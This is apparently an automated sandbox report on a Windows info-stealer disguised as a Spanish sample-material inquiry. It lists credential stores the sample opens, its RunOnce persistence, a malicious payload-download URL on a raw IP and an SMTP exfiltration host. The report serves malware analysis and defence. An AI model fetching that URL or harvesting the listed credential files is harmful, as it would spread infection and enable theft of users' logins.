      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_00406555 FindFirstFileW,FindClose,0_2_00406555
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405A03
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_0040287E FindFirstFileW,0_2_0040287E
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_00406555 FindFirstFileW,FindClose,3_2_00406555
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_0040287E FindFirstFileW,3_2_0040287E
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 3_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405A03
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeThread delayed: delay time: 100000Jump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.000000000592C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
      Source: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.00000000058C8000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.000000000592C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeAPI call chain: ExitProcess graph end nodegraph_0-4318
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeAPI call chain: ExitProcess graph end nodegraph_0-4477
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_00405840 CreateDirectoryW,GetLastError,GetLastError,LdrInitializeThunk,SetFileSecurityW,GetLastError,0_2_00405840
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeProcess created: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"Jump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeQueries volume information: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeCode function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040344A
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
      Source: C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
      Source: Yara matchFile source: 00000003.00000002.7577422376.0000000035D65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Disable or Modify Tools
      2
      OS Credential Dumping
      2
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      1
      Ingress Tool Transfer
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API
      1
      Registry Run Keys / Startup Folder
      1
      Access Token Manipulation
      1
      Deobfuscate/Decode Files or Information
      1
      Credentials in Registry
      136
      System Information Discovery
      Remote Desktop Protocol2
      Data from Local System
      1
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
      Process Injection
      2
      Obfuscated Files or Information
      Security Account Manager521
      Security Software Discovery
      SMB/Windows Admin Shares1
      Email Collection
      1
      Non-Standard Port
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      Registry Run Keys / Startup Folder
      1
      DLL Side-Loading
      NTDS251
      Virtualization/Sandbox Evasion
      Distributed Component Object Model1
      Clipboard Data
      2
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      Masquerading
      LSA Secrets1
      Application Window Discovery
      SSHKeylogging22
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
      Virtualization/Sandbox Evasion
      Cached Domain Credentials1
      System Network Configuration Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Access Token Manipulation
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
      Process Injection
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe37%ReversingLabsWin32.Trojan.InjectorX
      CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe100%AviraHEUR/AGEN.1333748
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\Cretinous\Adjudanter.exe100%AviraHEUR/AGEN.1333748
      C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dll0%ReversingLabs
      C:\Users\user\AppData\Roaming\Cretinous\Adjudanter.exe37%ReversingLabsWin32.Trojan.InjectorX
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
      http://107.150.18.109/vqdVIxqzrFAaCMWDM41.bin100%Avira URL Cloudmalware
      https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
      http://107.150.18.109/vqdVIxqzrFAaCMWDM41.bin90%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
      http://ip-api.com0%Avira URL Cloudsafe
      http://cacerts.thawte.com/ThawteTLSRSACAG1.crt00%Avira URL Cloudsafe
      http://status.thawte.com0:0%Avira URL Cloudsafe
      http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p0%Avira URL Cloudsafe
      http://ip-api.com/line/?fields=hosting0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      smtp.zoho.eu
      185.230.214.164
      truefalse
        unknown
        ip-api.com
        45.125.247.123
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://107.150.18.109/vqdVIxqzrFAaCMWDM41.binfalse
          • Avira URL Cloud: malware
          unknown
          http://ip-api.com/line/?fields=hostingfalse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://support.google.com/chrome/?p=plugin_flashCONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7577422376.0000000035DB7000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://107.150.18.109/vqdVIxqzrFAaCMWDM41.bin9CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.0000000005909000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorErrorCONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000000.00000000.2476495391.000000000040A000.00000008.00000001.01000000.00000003.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7577422376.0000000035D31000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.0000000038370000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383B2000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.00000000059AD000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383CD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://cdp.thawte.com/ThawteTLSRSACAG1.crl0pCONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.0000000038370000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383B2000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.00000000059AD000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383CD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://status.thawte.com0:CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.0000000038370000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383B2000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7566689607.00000000059AD000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7579433929.00000000383CD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ip-api.comCONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, 00000003.00000002.7577422376.0000000035D31000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          185.230.214.164
          smtp.zoho.euNetherlands
          41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHfalse
          45.125.247.123
          ip-api.comIndia
          136557HOST-AS-APHostUniversalPtyLtdAUtrue
          107.150.18.109
          unknownUnited States
          8100ASN-QUADRANET-GLOBALUSfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1510346
          Start date and time:2024-09-12 21:27:00 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 14m 53s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:4
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@3/14@2/3
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 92%
          • Number of executed functions: 173
          • Number of non-executed functions: 68
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
          • Execution Graph export aborted for target CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe, PID 6816 because it is empty
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
          TimeTypeDescription
          21:29:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Motorcyclists C:\Users\user\AppData\Roaming\Cretinous\Adjudanter.exe
          21:30:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Motorcyclists C:\Users\user\AppData\Roaming\Cretinous\Adjudanter.exe
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.230.214.164CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
            Orden#46789_2024_Optoflux_mexico_sderlss.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
              Orden#46789_2024_Optoflux_mexico_sderls.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                okPY77wv6E.exeGet hashmaliciousAgentTeslaBrowse
                  RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exeGet hashmaliciousAgentTeslaBrowse
                    RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeGet hashmaliciousGuLoaderBrowse
                      RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                        INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                          VBG dk Payment Receipt --doc87349281.batGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ip-api.comdecode_d1213cfcb6ee6791dcf785b67585548f1168d642e005e30d1682ea53c718e57d.exeGet hashmaliciousQuasarBrowse
                            • 208.95.112.1
                            http://tplshare.com/iVX5CrQGet hashmaliciousUnknownBrowse
                            • 51.77.64.70
                            https://url.uk.m.mimecastprotect.com/s/mPYbC6R8kf47GAUxtNC5T-0g?domain=tplshare.comGet hashmaliciousHTMLPhisherBrowse
                            • 208.95.112.2
                            documento de envio para fatura n#U00ba 52-FK-24.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            SecuriteInfo.com.Win32.SuspectCrc.25896.32261.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 208.95.112.1
                            Google%20Chrome.exeGet hashmaliciousAsyncRAT, XWormBrowse
                            • 208.95.112.1
                            ILV7tQG1Jl.exeGet hashmaliciousDCRat, XWormBrowse
                            • 208.95.112.1
                            Orden de Compra - (OC_17407)_9878764586975696879087867568.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            Orden de compra_0977086779870680675545.Pdf.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            OC_7001628119_7068059988.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            smtp.zoho.euCONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                            • 185.230.214.164
                            INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.jsGet hashmaliciousAgentTeslaBrowse
                            • 185.230.212.164
                            Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.jsGet hashmaliciousAgentTeslaBrowse
                            • 185.230.212.164
                            172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                            • 185.230.212.164
                            RFQ448903423_MAT_HASUE_de_Mexico.jsGet hashmaliciousAgentTeslaBrowse
                            • 185.230.212.164
                            File.com.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                            • 185.230.212.164
                            Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                            • 185.230.212.164
                            Orden#46789_2024_Optoflux_mexico_sderlss.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                            • 185.230.214.164
                            Orden#46789_2024_Optoflux_mexico_sderlsTY.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                            • 185.230.214.164
                            Orden#46789_2024_Optoflux_mexico_sderlsTYP.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                            • 185.230.214.164
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            COMPUTERLINEComputerlineSchlierbachSwitzerlandCHCONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                            • 185.230.214.164
                            https://americanathletic.zohodesk.com/portal/en/kb/articles/secure-business-documentsGet hashmaliciousUnknownBrowse
                            • 89.36.170.147
                            INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.jsGet hashmaliciousAgentTeslaBrowse
                            • 185.230.212.164
                            Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.jsGet hashmaliciousAgentTeslaBrowse
                            • 185.230.212.164
                            172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                            • 185.230.212.164
                            RFQ448903423_MAT_HASUE_de_Mexico.jsGet hashmaliciousAgentTeslaBrowse
                            • 185.230.212.164
                            bat.batGet hashmaliciousAsyncRAT, DcRat, PureLog Stealer, XWorm, zgRATBrowse
                            • 185.230.212.169
                            File.com.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                            • 185.230.212.164
                            https://forms.zohopublic.eu/oyika/form/OfficeAdministration/formperma/9Y9iItPBjtbizq-LjIqfCLG9lgQgDpYgginS586dnzMGet hashmaliciousUnknownBrowse
                            • 89.36.170.147
                            http://workdrive.zohoexternal.comGet hashmaliciousUnknownBrowse
                            • 89.36.170.147
                            ASN-QUADRANET-GLOBALUSRicowell Ind New INQ.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 64.188.18.75
                            ORDER.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 107.150.19.141
                            jMMTZcFBa8.elfGet hashmaliciousMirai, OkiruBrowse
                            • 155.94.232.241
                            S5RSIJ1pA1.exeGet hashmaliciousRedLineBrowse
                            • 194.49.68.19
                            GLP3VibiyA.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                            • 64.188.9.175
                            fYHJsEQSv0.exeGet hashmaliciousRemcosBrowse
                            • 162.218.211.203
                            XQmV6MKs53.exeGet hashmaliciousRemcosBrowse
                            • 162.218.211.203
                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 204.44.124.137
                            Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 204.44.124.137
                            SecuriteInfo.com.Linux.Siggen.9999.8352.26322.elfGet hashmaliciousMiraiBrowse
                            • 172.93.183.162
                            HOST-AS-APHostUniversalPtyLtdAUhttp://www.nenechicken.com.auGet hashmaliciousUnknownBrowse
                            • 103.192.80.101
                            6i9b6tyyQF.elfGet hashmaliciousMiraiBrowse
                            • 103.119.111.79
                            SecureMessage99331.htMGet hashmaliciousHTMLPhisherBrowse
                            • 103.146.112.32
                            ryidtyjrhGet hashmaliciousUnknownBrowse
                            • 103.146.112.152
                            3E1t6Pk34A.elfGet hashmaliciousMiraiBrowse
                            • 103.192.86.42
                            Note.oneGet hashmaliciousQbotBrowse
                            • 103.192.80.173
                            oS2M3K9VDO.elfGet hashmaliciousMirai, MoobotBrowse
                            • 103.119.111.89
                            https://app.smartsheet.com/b/download/att/1/7953430800033668/2d1kcfy3a3mgsxdrbomrc9v3joGet hashmaliciousHTMLPhisherBrowse
                            • 180.149.229.13
                            tUcbdMVsydGet hashmaliciousGafgyt, MiraiBrowse
                            • 103.217.254.124
                            SSH.mipsGet hashmaliciousMiraiBrowse
                            • 103.119.111.38
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\nsz2C67.tmp\System.dllSecuriteInfo.com.Riskware.Application.5189.31489.exeGet hashmaliciousUnknownBrowse
                              INQ No. HDPE-16-GM-00- PI-INQ-300.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                INQ No. HDPE-16-GM-00- PI-INQ-300.bat.exeGet hashmaliciousGuLoaderBrowse
                                  INQ No. HDPE-16-GM-00.bat.exeGet hashmaliciousUnknownBrowse
                                    INQ No. HDPE-16-GM-00.bat.exeGet hashmaliciousUnknownBrowse
                                      SecuriteInfo.com.FileRepMalware.18455.13769.exeGet hashmaliciousGuLoaderBrowse
                                        SecuriteInfo.com.FileRepMalware.18455.13769.exeGet hashmaliciousGuLoaderBrowse
                                          HSBC Payment Advice.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            DHL STATEMENT OF ACCOUNT - 30082024.exeGet hashmaliciousGuLoaderBrowse
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):277750
                                              Entropy (8bit):1.2492394418872979
                                              Encrypted:false
                                              SSDEEP:768:jHI1HmMsoC8HHL1IR5NgiLi1ki9fQ7rMRxSMNcbwhP6CEPUl3EeKsG1p6lPg0Bk7:TR4HsbMWie2aM0nybFA+GfIe4Z0vH
                                              MD5:30D59B55CD4CA2ED2E3EBCFCA6038AF6
                                              SHA1:51001D9D7C7DF81766322C2A9F9138443861AA43
                                              SHA-256:A8C4799B149C33964562AB690CD78F138C4B6BEC7D717C793C23405C0B40467C
                                              SHA-512:F16CD06AB6EED55ACD71607F2AA48C346D9473D2FDB1A133BE63EBC1691E5CB60428F31666472A21D89495ABDE7A7E50A04F7197D135FBB65EFB4989ACA6516E
                                              Malicious:false
                                              Reputation:low
                                              Preview:.............).........................................{..............G..................*.......g........P....n...........................?.................................................................................\.........................F.............i....N.................................................................................................2. ....................m}........................w.....................................m..................C....................................................w............................<.............................'I..............[..............Z....U.......................................................5.Z................y.........X...........................Q..................................."....<.................]...........................*..................................................f...........................c......................................h.............. ........r..............q..............W.........
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:data
                                              Category:dropped
